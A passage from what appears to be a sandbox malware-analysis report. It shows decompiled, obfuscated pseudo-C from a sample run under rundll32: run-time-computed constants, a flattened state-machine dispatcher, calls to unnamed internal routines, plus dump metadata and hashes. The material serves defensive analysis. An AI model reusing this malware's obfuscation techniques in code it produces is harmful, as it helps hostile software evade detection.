                                                                                                                                    				signed int _v1612;
                                                                                                                                    				signed int _v1616;
                                                                                                                                    				signed int _v1620;
                                                                                                                                    				signed int _v1624;
                                                                                                                                    				signed int _v1628;
                                                                                                                                    				signed int _v1632;
                                                                                                                                    				signed int _v1636;
                                                                                                                                    				signed int _v1640;
                                                                                                                                    				signed int _v1644;
                                                                                                                                    				signed int _v1648;
                                                                                                                                    				signed int _v1652;
                                                                                                                                    				signed int _v1656;
                                                                                                                                    				signed int _v1660;
                                                                                                                                    				signed int _v1664;
                                                                                                                                    				signed int _v1668;
                                                                                                                                    				signed int _v1672;
                                                                                                                                    				signed int _v1676;
                                                                                                                                    				signed int _v1680;
                                                                                                                                    				signed int _v1684;
                                                                                                                                    				signed int _v1688;
                                                                                                                                    				signed int _v1692;
                                                                                                                                    				signed int _v1696;
                                                                                                                                    				signed int _v1700;
                                                                                                                                    				signed int _v1704;
                                                                                                                                    				signed int _v1708;
                                                                                                                                    				void* _t341;
                                                                                                                                    				void* _t370;
                                                                                                                                    				void* _t379;
                                                                                                                                    				intOrPtr _t382;
                                                                                                                                    				intOrPtr _t385;
                                                                                                                                    				void* _t396;
                                                                                                                                    				intOrPtr _t399;
                                                                                                                                    				intOrPtr _t436;
                                                                                                                                    				signed int _t437;
                                                                                                                                    				signed int _t438;
                                                                                                                                    				signed int _t439;
                                                                                                                                    				signed int _t440;
                                                                                                                                    				signed int _t441;
                                                                                                                                    				signed int _t442;
                                                                                                                                    				signed int _t443;
                                                                                                                                    				signed int _t444;
                                                                                                                                    				signed int* _t449;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_t436 = 0;
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(0);
                                                                                                                                    				E002D20B9(_t341);
                                                                                                                                    				_v1572 = 0xe82680;
                                                                                                                                    				_t449 =  &(( &_v1708)[5]);
                                                                                                                                    				_v1568 = 0;
                                                                                                                                    				_v1564 = 0;
                                                                                                                                    				_t396 = 0x9368da1;
                                                                                                                                    				_v1584 = 0x42403b;
                                                                                                                                    				_v1584 = _v1584 + 0xffffd771;
                                                                                                                                    				_v1584 = _v1584 ^ 0x00421785;
                                                                                                                                    				_v1692 = 0xc00255;
                                                                                                                                    				_t437 = 0x16;
                                                                                                                                    				_v1692 = _v1692 / _t437;
                                                                                                                                    				_v1692 = _v1692 + 0xffff6b87;
                                                                                                                                    				_v1692 = _v1692 + 0xffff176e;
                                                                                                                                    				_v1692 = _v1692 ^ 0x0004c90f;
                                                                                                                                    				_v1668 = 0x5abcaa;
                                                                                                                                    				_v1668 = _v1668 | 0xa6adf3e3;
                                                                                                                                    				_v1668 = _v1668 + 0xffff713c;
                                                                                                                                    				_v1668 = _v1668 << 6;
                                                                                                                                    				_v1668 = _v1668 ^ 0xbfd49dc8;
                                                                                                                                    				_v1700 = 0xb35187;
                                                                                                                                    				_v1700 = _v1700 | 0x50a44dff;
                                                                                                                                    				_v1700 = _v1700 + 0xfffff2e6;
                                                                                                                                    				_v1700 = _v1700 >> 8;
                                                                                                                                    				_v1700 = _v1700 ^ 0x0051b9c1;
                                                                                                                                    				_v1644 = 0x4d7cc3;
                                                                                                                                    				_v1644 = _v1644 + 0xffffa786;
                                                                                                                                    				_v1644 = _v1644 | 0x8b8a715e;
                                                                                                                                    				_v1644 = _v1644 ^ 0x6234f021;
                                                                                                                                    				_v1644 = _v1644 ^ 0xe9f998a6;
                                                                                                                                    				_v1624 = 0x204c5b;
                                                                                                                                    				_v1624 = _v1624 + 0xffffa901;
                                                                                                                                    				_v1624 = _v1624 + 0x49e1;
                                                                                                                                    				_v1624 = _v1624 ^ 0x002fe6aa;
                                                                                                                                    				_v1632 = 0xbb0a9b;
                                                                                                                                    				_v1632 = _v1632 * 0x52;
                                                                                                                                    				_v1632 = _v1632 | 0x83893080;
                                                                                                                                    				_v1632 = _v1632 ^ 0xbbe905c0;
                                                                                                                                    				_v1620 = 0x19fb1a;
                                                                                                                                    				_v1620 = _v1620 | 0x985eae3d;
                                                                                                                                    				_v1620 = _v1620 + 0xf613;
                                                                                                                                    				_v1620 = _v1620 ^ 0x9864c971;
                                                                                                                                    				_v1656 = 0x35ecb4;
                                                                                                                                    				_v1656 = _v1656 * 0x29;
                                                                                                                                    				_v1656 = _v1656 + 0x1081;
                                                                                                                                    				_v1656 = _v1656 + 0xffffd324;
                                                                                                                                    				_v1656 = _v1656 ^ 0x08a8fe56;
                                                                                                                                    				_v1580 = 0xc60f6f;
                                                                                                                                    				_v1580 = _v1580 + 0xffffd3e6;
                                                                                                                                    				_v1580 = _v1580 ^ 0x00c233ea;
                                                                                                                                    				_v1664 = 0x2df5c;
                                                                                                                                    				_v1664 = _v1664 << 8;
                                                                                                                                    				_v1664 = _v1664 * 0x4c;
                                                                                                                                    				_v1664 = _v1664 + 0xffffaed7;
                                                                                                                                    				_v1664 = _v1664 ^ 0xda40187b;
                                                                                                                                    				_v1672 = 0x38409b;
                                                                                                                                    				_v1672 = _v1672 * 0x33;
                                                                                                                                    				_v1672 = _v1672 | 0x7fcdffbb;
                                                                                                                                    				_v1672 = _v1672 ^ 0x7ff87770;
                                                                                                                                    				_v1680 = 0xe751cb;
                                                                                                                                    				_v1680 = _v1680 ^ 0x8590ed7d;
                                                                                                                                    				_v1680 = _v1680 + 0xffffebc9;
                                                                                                                                    				_v1680 = _v1680 * 0x5e;
                                                                                                                                    				_v1680 = _v1680 ^ 0x01e2719c;
                                                                                                                                    				_v1688 = 0x15e1cd;
                                                                                                                                    				_v1688 = _v1688 + 0xfe19;
                                                                                                                                    				_v1688 = _v1688 + 0xffffc88c;
                                                                                                                                    				_v1688 = _v1688 << 7;
                                                                                                                                    				_v1688 = _v1688 ^ 0x0b5f3deb;
                                                                                                                                    				_v1696 = 0x33a377;
                                                                                                                                    				_v1696 = _v1696 << 0xa;
                                                                                                                                    				_v1696 = _v1696 ^ 0xfb2d04b5;
                                                                                                                                    				_v1696 = _v1696 | 0xd2f07883;
                                                                                                                                    				_v1696 = _v1696 ^ 0xf7fa7ce3;
                                                                                                                                    				_v1640 = 0x94004d;
                                                                                                                                    				_v1640 = _v1640 >> 0xa;
                                                                                                                                    				_t438 = 0x67;
                                                                                                                                    				_v1640 = _v1640 * 0x3d;
                                                                                                                                    				_v1640 = _v1640 >> 7;
                                                                                                                                    				_v1640 = _v1640 ^ 0x00039ca1;
                                                                                                                                    				_v1648 = 0xfcfef3;
                                                                                                                                    				_v1648 = _v1648 * 0x18;
                                                                                                                                    				_v1648 = _v1648 + 0x9c71;
                                                                                                                                    				_v1648 = _v1648 | 0xf5d6202a;
                                                                                                                                    				_v1648 = _v1648 ^ 0xf7f57601;
                                                                                                                                    				_v1596 = 0xc58f80;
                                                                                                                                    				_v1596 = _v1596 + 0xffff2f17;
                                                                                                                                    				_v1596 = _v1596 ^ 0x00ce700d;
                                                                                                                                    				_v1684 = 0xee980b;
                                                                                                                                    				_v1684 = _v1684 >> 6;
                                                                                                                                    				_v1684 = _v1684 / _t438;
                                                                                                                                    				_v1684 = _v1684 + 0xffff2a3f;
                                                                                                                                    				_v1684 = _v1684 ^ 0xfff3655c;
                                                                                                                                    				_v1652 = 0x45a4a9;
                                                                                                                                    				_v1652 = _v1652 >> 0xe;
                                                                                                                                    				_t439 = 0x6e;
                                                                                                                                    				_v1652 = _v1652 * 0x51;
                                                                                                                                    				_v1652 = _v1652 + 0x9be3;
                                                                                                                                    				_v1652 = _v1652 ^ 0x0004d4d8;
                                                                                                                                    				_v1708 = 0x222243;
                                                                                                                                    				_t176 =  &_v1708; // 0x222243
                                                                                                                                    				_v1708 =  *_t176 / _t439;
                                                                                                                                    				_v1708 = _v1708 << 9;
                                                                                                                                    				_v1708 = _v1708 + 0xffff4a12;
                                                                                                                                    				_v1708 = _v1708 ^ 0x009b5339;
                                                                                                                                    				_v1612 = 0x464ea3;
                                                                                                                                    				_v1612 = _v1612 + 0x89cc;
                                                                                                                                    				_v1612 = _v1612 >> 2;
                                                                                                                                    				_v1612 = _v1612 ^ 0x00167067;
                                                                                                                                    				_v1588 = 0xd74d9e;
                                                                                                                                    				_v1588 = _v1588 | 0x529da741;
                                                                                                                                    				_v1588 = _v1588 ^ 0x52d09c78;
                                                                                                                                    				_v1628 = 0x60b5eb;
                                                                                                                                    				_v1628 = _v1628 >> 9;
                                                                                                                                    				_t440 = 0x19;
                                                                                                                                    				_v1628 = _v1628 / _t440;
                                                                                                                                    				_v1628 = _v1628 ^ 0x000ff1bc;
                                                                                                                                    				_v1676 = 0xfb7b01;
                                                                                                                                    				_v1676 = _v1676 << 4;
                                                                                                                                    				_v1676 = _v1676 + 0xffffc28e;
                                                                                                                                    				_t441 = 0x1b;
                                                                                                                                    				_v1676 = _v1676 / _t441;
                                                                                                                                    				_v1676 = _v1676 ^ 0x0096cb21;
                                                                                                                                    				_v1660 = 0xed67c1;
                                                                                                                                    				_v1660 = _v1660 << 0xa;
                                                                                                                                    				_v1660 = _v1660 | 0xef7d69c8;
                                                                                                                                    				_v1660 = _v1660 << 2;
                                                                                                                                    				_v1660 = _v1660 ^ 0xfff42fe1;
                                                                                                                                    				_v1604 = 0x46c7e8;
                                                                                                                                    				_v1604 = _v1604 << 0xf;
                                                                                                                                    				_v1604 = _v1604 ^ 0x63fe3710;
                                                                                                                                    				_v1636 = 0x7a345b;
                                                                                                                                    				_v1636 = _v1636 + 0xd479;
                                                                                                                                    				_v1636 = _v1636 + 0x8c7f;
                                                                                                                                    				_v1636 = _v1636 ^ 0x00708a00;
                                                                                                                                    				_v1704 = 0x80508e;
                                                                                                                                    				_v1704 = _v1704 ^ 0xf958081f;
                                                                                                                                    				_t442 = 0x4b;
                                                                                                                                    				_v1704 = _v1704 / _t442;
                                                                                                                                    				_t443 = 0x34;
                                                                                                                                    				_v1704 = _v1704 * 0x44;
                                                                                                                                    				_v1704 = _v1704 ^ 0xe2885afb;
                                                                                                                                    				_v1576 = 0x325f4f;
                                                                                                                                    				_t259 =  &_v1576; // 0x325f4f
                                                                                                                                    				_v1576 =  *_t259 * 0x7a;
                                                                                                                                    				_v1576 = _v1576 ^ 0x180920ed;
                                                                                                                                    				_v1592 = 0xd554f9;
                                                                                                                                    				_v1592 = _v1592 * 0x4e;
                                                                                                                                    				_v1592 = _v1592 ^ 0x40f8e8dd;
                                                                                                                                    				_v1608 = 0x6be570;
                                                                                                                                    				_v1608 = _v1608 + 0x3d4f;
                                                                                                                                    				_v1608 = _v1608 ^ 0x4461575c;
                                                                                                                                    				_v1608 = _v1608 ^ 0x440eeedf;
                                                                                                                                    				_v1616 = 0x4acfbf;
                                                                                                                                    				_v1616 = _v1616 / _t443;
                                                                                                                                    				_t444 = 0xe;
                                                                                                                                    				_v1616 = _v1616 / _t444;
                                                                                                                                    				_v1616 = _v1616 ^ 0x000fdd65;
                                                                                                                                    				_v1600 = 0x55de88;
                                                                                                                                    				_v1600 = _v1600 << 2;
                                                                                                                                    				_v1600 = _v1600 ^ 0x01580110;
                                                                                                                                    				do {
                                                                                                                                    					while(_t396 != 0x196a97b) {
                                                                                                                                    						if(_t396 == 0x2ca432c) {
                                                                                                                                    							_push(_v1652);
                                                                                                                                    							_push(_v1684);
                                                                                                                                    							_t379 = E002DDCF7(_v1596, 0x2c10f0, __eflags);
                                                                                                                                    							E002D176B( &_v1560, __eflags);
                                                                                                                                    							_t382 =  *0x2e3e10; // 0x0
                                                                                                                                    							_t385 =  *0x2e3e10; // 0x0
                                                                                                                                    							E002DE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
                                                                                                                                    							E002CA8B0(_v1704, _t379, _v1576);
                                                                                                                                    							_t449 =  &(_t449[0xf]);
                                                                                                                                    							_t396 = 0x9d0e956;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t396 == 0x9368da1) {
                                                                                                                                    								_push(_v1644);
                                                                                                                                    								_push(_v1584);
                                                                                                                                    								_push(_v1700);
                                                                                                                                    								_push( &_v1040);
                                                                                                                                    								E002D46BB(_v1692, _v1668);
                                                                                                                                    								_t449 = _t449 - 0xc + 0x1c;
                                                                                                                                    								_t396 = 0x196a97b;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								_t456 = _t396 - 0x9d0e956;
                                                                                                                                    								if(_t396 != 0x9d0e956) {
                                                                                                                                    									goto L10;
                                                                                                                                    								} else {
                                                                                                                                    									_push(_v1600);
                                                                                                                                    									_push(_t436);
                                                                                                                                    									_push(_t396);
                                                                                                                                    									_push(_t436);
                                                                                                                                    									_push(_t436);
                                                                                                                                    									_push(_v1616);
                                                                                                                                    									_push( &_v520);
                                                                                                                                    									E002CAB87(_v1592, _v1608, _t456);
                                                                                                                                    									_t436 =  !=  ? 1 : _t436;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L6:
                                                                                                                                    						return _t436;
                                                                                                                                    					}
                                                                                                                                    					_push(_v1620);
                                                                                                                                    					_push(_v1632);
                                                                                                                                    					_t370 = E002DDCF7(_v1624, 0x2c1020, __eflags);
                                                                                                                                    					E002D176B( &_v1560, __eflags);
                                                                                                                                    					_t399 =  *0x2e3e10; // 0x0
                                                                                                                                    					_t336 = _t399 + 0x1c; // 0x1c
                                                                                                                                    					_t337 = _t399 + 0x23c; // 0x23c
                                                                                                                                    					E002D1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
                                                                                                                                    					E002CA8B0(_v1640, _t370, _v1648);
                                                                                                                                    					_t449 =  &(_t449[0xf]);
                                                                                                                                    					_t396 = 0x9d0e956;
                                                                                                                                    					L10:
                                                                                                                                    					__eflags = _t396 - 0xce3b296;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L6;
                                                                                                                                    			}

                                                                                                                                    0x002dccf0
                                                                                                                                    0x002dccfb
                                                                                                                                    0x002dcd06
                                                                                                                                    0x002dcd11
                                                                                                                                    0x002dcd19
                                                                                                                                    0x002dcd23
                                                                                                                                    0x002dcd27
                                                                                                                                    0x002dcd2f
                                                                                                                                    0x002dcd37
                                                                                                                                    0x002dcd44
                                                                                                                                    0x002dcd48
                                                                                                                                    0x002dcd50
                                                                                                                                    0x002dcd58
                                                                                                                                    0x002dcd60
                                                                                                                                    0x002dcd68
                                                                                                                                    0x002dcd75
                                                                                                                                    0x002dcd7b
                                                                                                                                    0x002dcd83
                                                                                                                                    0x002dcd8b
                                                                                                                                    0x002dcd93
                                                                                                                                    0x002dcd9b
                                                                                                                                    0x002dcda0
                                                                                                                                    0x002dcda8
                                                                                                                                    0x002dcdb0
                                                                                                                                    0x002dcdb5
                                                                                                                                    0x002dcdbd
                                                                                                                                    0x002dcdc5
                                                                                                                                    0x002dcdcd
                                                                                                                                    0x002dcdd5
                                                                                                                                    0x002dcde1
                                                                                                                                    0x002dcde4
                                                                                                                                    0x002dcde8
                                                                                                                                    0x002dcded
                                                                                                                                    0x002dcdf5
                                                                                                                                    0x002dce02
                                                                                                                                    0x002dce06
                                                                                                                                    0x002dce0e
                                                                                                                                    0x002dce16
                                                                                                                                    0x002dce1e
                                                                                                                                    0x002dce29
                                                                                                                                    0x002dce34
                                                                                                                                    0x002dce3f
                                                                                                                                    0x002dce47
                                                                                                                                    0x002dce54
                                                                                                                                    0x002dce58
                                                                                                                                    0x002dce60
                                                                                                                                    0x002dce68
                                                                                                                                    0x002dce70
                                                                                                                                    0x002dce7a
                                                                                                                                    0x002dce7d
                                                                                                                                    0x002dce81
                                                                                                                                    0x002dce89
                                                                                                                                    0x002dce91
                                                                                                                                    0x002dce99
                                                                                                                                    0x002dcea1
                                                                                                                                    0x002dcea5
                                                                                                                                    0x002dceaa
                                                                                                                                    0x002dceb2
                                                                                                                                    0x002dceba
                                                                                                                                    0x002dcec2
                                                                                                                                    0x002dceca
                                                                                                                                    0x002dcecf
                                                                                                                                    0x002dced7
                                                                                                                                    0x002dcee2
                                                                                                                                    0x002dceed
                                                                                                                                    0x002dcef8
                                                                                                                                    0x002dcf00
                                                                                                                                    0x002dcf09
                                                                                                                                    0x002dcf0e
                                                                                                                                    0x002dcf14
                                                                                                                                    0x002dcf1c
                                                                                                                                    0x002dcf24
                                                                                                                                    0x002dcf29
                                                                                                                                    0x002dcf35
                                                                                                                                    0x002dcf38
                                                                                                                                    0x002dcf3c
                                                                                                                                    0x002dcf44
                                                                                                                                    0x002dcf4c
                                                                                                                                    0x002dcf51
                                                                                                                                    0x002dcf5b
                                                                                                                                    0x002dcf65
                                                                                                                                    0x002dcf72
                                                                                                                                    0x002dcf7a
                                                                                                                                    0x002dcf7f
                                                                                                                                    0x002dcf87
                                                                                                                                    0x002dcf8f
                                                                                                                                    0x002dcf97
                                                                                                                                    0x002dcf9f
                                                                                                                                    0x002dcfa7
                                                                                                                                    0x002dcfaf
                                                                                                                                    0x002dcfbd
                                                                                                                                    0x002dcfc2
                                                                                                                                    0x002dcfcd
                                                                                                                                    0x002dcfd0
                                                                                                                                    0x002dcfd4
                                                                                                                                    0x002dcfdc
                                                                                                                                    0x002dcfe7
                                                                                                                                    0x002dcfef
                                                                                                                                    0x002dcff6
                                                                                                                                    0x002dd001
                                                                                                                                    0x002dd014
                                                                                                                                    0x002dd01b
                                                                                                                                    0x002dd026
                                                                                                                                    0x002dd02e
                                                                                                                                    0x002dd036
                                                                                                                                    0x002dd03e
                                                                                                                                    0x002dd046
                                                                                                                                    0x002dd056
                                                                                                                                    0x002dd05e
                                                                                                                                    0x002dd061
                                                                                                                                    0x002dd065
                                                                                                                                    0x002dd06d
                                                                                                                                    0x002dd075
                                                                                                                                    0x002dd07a
                                                                                                                                    0x002dd082
                                                                                                                                    0x002dd082
                                                                                                                                    0x002dd090
                                                                                                                                    0x002dd119
                                                                                                                                    0x002dd122
                                                                                                                                    0x002dd12d
                                                                                                                                    0x002dd13b
                                                                                                                                    0x002dd149
                                                                                                                                    0x002dd16e
                                                                                                                                    0x002dd19b
                                                                                                                                    0x002dd1ad
                                                                                                                                    0x002dd1b2
                                                                                                                                    0x002dd1b5
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd096
                                                                                                                                    0x002dd09c
                                                                                                                                    0x002dd0e8
                                                                                                                                    0x002dd0f3
                                                                                                                                    0x002dd0fa
                                                                                                                                    0x002dd109
                                                                                                                                    0x002dd10a
                                                                                                                                    0x002dd10f
                                                                                                                                    0x002dd112
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd09e
                                                                                                                                    0x002dd09e
                                                                                                                                    0x002dd0a0
                                                                                                                                    0x00000000
                                                                                                                                    0x002dd0a6
                                                                                                                                    0x002dd0a6
                                                                                                                                    0x002dd0b1
                                                                                                                                    0x002dd0b2
                                                                                                                                    0x002dd0b3
                                                                                                                                    0x002dd0b4
                                                                                                                                    0x002dd0b5
                                                                                                                                    0x002dd0ca
                                                                                                                                    0x002dd0cb
                                                                                                                                    0x002dd0d8
                                                                                                                                    0x002dd0d8
                                                                                                                                    0x002dd0a0
                                                                                                                                    0x002dd09c
                                                                                                                                    0x002dd0db
                                                                                                                                    0x002dd0e7
                                                                                                                                    0x002dd0e7
                                                                                                                                    0x002dd1bc
                                                                                                                                    0x002dd1c5
                                                                                                                                    0x002dd1cd
                                                                                                                                    0x002dd1db
                                                                                                                                    0x002dd212
                                                                                                                                    0x002dd21f
                                                                                                                                    0x002dd223
                                                                                                                                    0x002dd22e
                                                                                                                                    0x002dd243
                                                                                                                                    0x002dd248
                                                                                                                                    0x002dd24b
                                                                                                                                    0x002dd24d
                                                                                                                                    0x002dd24d
                                                                                                                                    0x002dd24d
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID: ;@B$C""$M$O_2$[4z$[L $\WaD$I
                                                                                                                                    • API String ID: 1514166925-553023378
                                                                                                                                    • Opcode ID: 99ab995539dbf5a20ac88a5fe9f26969766ea8fca112e78c1e96ca737ca57872
                                                                                                                                    • Instruction ID: aa8d17ce6ed48d7257e9a2c22dfef5707f48bad2cadcb6172f315913a23820e9
                                                                                                                                    • Opcode Fuzzy Hash: 99ab995539dbf5a20ac88a5fe9f26969766ea8fca112e78c1e96ca737ca57872
                                                                                                                                    • Instruction Fuzzy Hash: 5B022FB15083819FD364CF25C98AA9BFBE1FBC4708F10891EF1D986260D7B1895ACF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E002C70B3(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				char _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				void* _t276;
                                                                                                                                    				intOrPtr _t301;
                                                                                                                                    				void* _t302;
                                                                                                                                    				intOrPtr _t305;
                                                                                                                                    				void* _t306;
                                                                                                                                    				intOrPtr _t312;
                                                                                                                                    				intOrPtr* _t314;
                                                                                                                                    				void* _t316;
                                                                                                                                    				intOrPtr _t340;
                                                                                                                                    				signed int _t343;
                                                                                                                                    				signed int _t344;
                                                                                                                                    				signed int _t345;
                                                                                                                                    				signed int _t346;
                                                                                                                                    				signed int _t347;
                                                                                                                                    				signed int _t348;
                                                                                                                                    				signed int _t349;
                                                                                                                                    				signed int* _t352;
                                                                                                                                    
                                                                                                                                    				_t342 = _a4;
                                                                                                                                    				_t314 = __edx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t276);
                                                                                                                                    				_v8 = 0xc5496b;
                                                                                                                                    				_t340 = 0;
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_t352 =  &(( &_v128)[5]);
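                                                                                                                                    				// _v20 through _v128 each start from an immediate and pass through a fixed chain of arithmetic and bitwise operations, so each ends up as a constant computed at run time instead of appearing as a literal. They are later passed as call arguments or compared with return values (_v88, _v108).
                                                                                                                                    				_v96 = 0xa893e5;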
                                                                                                                                    				_v96 = _v96 >> 0xb;
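                                                                                                                                    				// _t316 is the state variable tested by the do/while dispatcher further down; 0x77ea95 is its starting state.
                                                                                                                                    				_t316 = 0x77ea95;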
                                                                                                                                    				_v96 = _v96 ^ 0xaec74c08;
                                                                                                                                    				_v96 = _v96 + 0xffff5908;
                                                                                                                                    				_v96 = _v96 ^ 0xaec6b223;
                                                                                                                                    				_v120 = 0x460837;
                                                                                                                                    				_v120 = _v120 << 0xe;
                                                                                                                                    				_t343 = 0x61;
                                                                                                                                    				_v120 = _v120 / _t343;
                                                                                                                                    				_v120 = _v120 ^ 0xba448c5d;
                                                                                                                                    				_v120 = _v120 ^ 0xbb13b056;
                                                                                                                                    				_v100 = 0x5f60bb;
                                                                                                                                    				_t344 = 0x67;
                                                                                                                                    				_v100 = _v100 / _t344;
                                                                                                                                    				_v100 = _v100 << 2;
                                                                                                                                    				_v100 = _v100 << 0xe;
                                                                                                                                    				_v100 = _v100 ^ 0xed0e0000;
                                                                                                                                    				_v104 = 0xcda695;
                                                                                                                                    				_t345 = 0x65;
                                                                                                                                    				_v104 = _v104 * 0x11;
                                                                                                                                    				_v104 = _v104 + 0xffffbfc8;
                                                                                                                                    				_v104 = _v104 / _t345;
                                                                                                                                    				_v104 = _v104 ^ 0x00229cab;
                                                                                                                                    				_v88 = 0xcb9151;
                                                                                                                                    				_v88 = _v88 + 0x59e9;
                                                                                                                                    				_v88 = _v88 ^ 0x7c8ac0da;
                                                                                                                                    				_v88 = _v88 >> 0xc;
                                                                                                                                    				_v88 = _v88 ^ 0x0007c412;
                                                                                                                                    				_v124 = 0xc27732;
                                                                                                                                    				_v124 = _v124 << 5;
                                                                                                                                    				_v124 = _v124 * 0x69;
                                                                                                                                    				_v124 = _v124 >> 0xd;
                                                                                                                                    				_v124 = _v124 ^ 0x0007c2e3;
                                                                                                                                    				_v108 = 0xd451e;
                                                                                                                                    				_v108 = _v108 | 0x03d9c36b;
                                                                                                                                    				_v108 = _v108 << 0x10;
                                                                                                                                    				_v108 = _v108 >> 7;
                                                                                                                                    				_v108 = _v108 ^ 0x018efe00;
                                                                                                                                    				_v24 = 0xe3266e;
                                                                                                                                    				_v24 = _v24 ^ 0xb39ac5a6;
                                                                                                                                    				_v24 = _v24 ^ 0xb37ebd00;
                                                                                                                                    				_v60 = 0xdd6dbc;
                                                                                                                                    				_v60 = _v60 << 0xc;
                                                                                                                                    				_v60 = _v60 >> 0xd;
                                                                                                                                    				_v60 = _v60 ^ 0x00066ea0;
                                                                                                                                    				_v92 = 0xdc27c1;
                                                                                                                                    				_v92 = _v92 ^ 0xb7b3afa8;
                                                                                                                                    				_t346 = 0x51;
                                                                                                                                    				_v92 = _v92 / _t346;
                                                                                                                                    				_v92 = _v92 >> 0xb;
                                                                                                                                    				_v92 = _v92 ^ 0x000e15f4;
                                                                                                                                    				_v28 = 0x55985f;
                                                                                                                                    				_t347 = 0x64;
                                                                                                                                    				_v28 = _v28 * 0x1f;
                                                                                                                                    				_v28 = _v28 ^ 0x0a58c7ef;
                                                                                                                                    				_v64 = 0x4cb0ae;
                                                                                                                                    				_v64 = _v64 * 0x59;
                                                                                                                                    				_v64 = _v64 + 0xffff44f7;
                                                                                                                                    				_v64 = _v64 ^ 0x1aa02a50;
                                                                                                                                    				_v32 = 0x4c255b;
                                                                                                                                    				_v32 = _v32 >> 0xc;
                                                                                                                                    				_v32 = _v32 ^ 0x000ba021;
                                                                                                                                    				_v68 = 0x1bdf1a;
                                                                                                                                    				_v68 = _v68 << 0xe;
                                                                                                                                    				_v68 = _v68 << 8;
                                                                                                                                    				_v68 = _v68 ^ 0xc683e60f;
                                                                                                                                    				_v36 = 0xeace7c;
                                                                                                                                    				_v36 = _v36 ^ 0x32d1e31b;
                                                                                                                                    				_v36 = _v36 ^ 0x32395a0e;
                                                                                                                                    				_v52 = 0x5778bf;
                                                                                                                                    				_v52 = _v52 * 0x53;
                                                                                                                                    				_v52 = _v52 ^ 0x1c501c28;
                                                                                                                                    				_v56 = 0x56e07;
                                                                                                                                    				_v56 = _v56 / _t347;
                                                                                                                                    				_v56 = _v56 ^ 0x000a0e4e;
                                                                                                                                    				_v128 = 0x2ec397;
                                                                                                                                    				_v128 = _v128 + 0xffff4016;
                                                                                                                                    				_v128 = _v128 ^ 0xc29a5f5c;
                                                                                                                                    				_v128 = _v128 << 0xa;
                                                                                                                                    				_v128 = _v128 ^ 0xd1754ce1;
                                                                                                                                    				_v112 = 0x486dea;
                                                                                                                                    				_t159 =  &_v112; // 0x486dea
                                                                                                                                    				_t348 = 0x16;
                                                                                                                                    				_v112 =  *_t159 * 0x75;
                                                                                                                                    				_v112 = _v112 << 3;
                                                                                                                                    				_v112 = _v112 + 0xffff4e4a;
                                                                                                                                    				_v112 = _v112 ^ 0x08d01f1a;
                                                                                                                                    				_v116 = 0xad5672;
                                                                                                                                    				_v116 = _v116 << 0xa;
                                                                                                                                    				_v116 = _v116 * 0x32;
                                                                                                                                    				_v116 = _v116 >> 1;
                                                                                                                                    				_v116 = _v116 ^ 0x35c1a461;
                                                                                                                                    				_v40 = 0x750aef;
                                                                                                                                    				_v40 = _v40 << 0xe;
                                                                                                                                    				_v40 = _v40 ^ 0x42b6a378;
                                                                                                                                    				_v72 = 0x7e8fee;
                                                                                                                                    				_v72 = _v72 << 0xe;
                                                                                                                                    				_v72 = _v72 + 0x885b;
                                                                                                                                    				_v72 = _v72 ^ 0xa3f43c0d;
                                                                                                                                    				_v44 = 0x717d1a;
                                                                                                                                    				_v44 = _v44 >> 0xf;
                                                                                                                                    				_v44 = _v44 ^ 0x000f68d6;
                                                                                                                                    				_v48 = 0x815897;
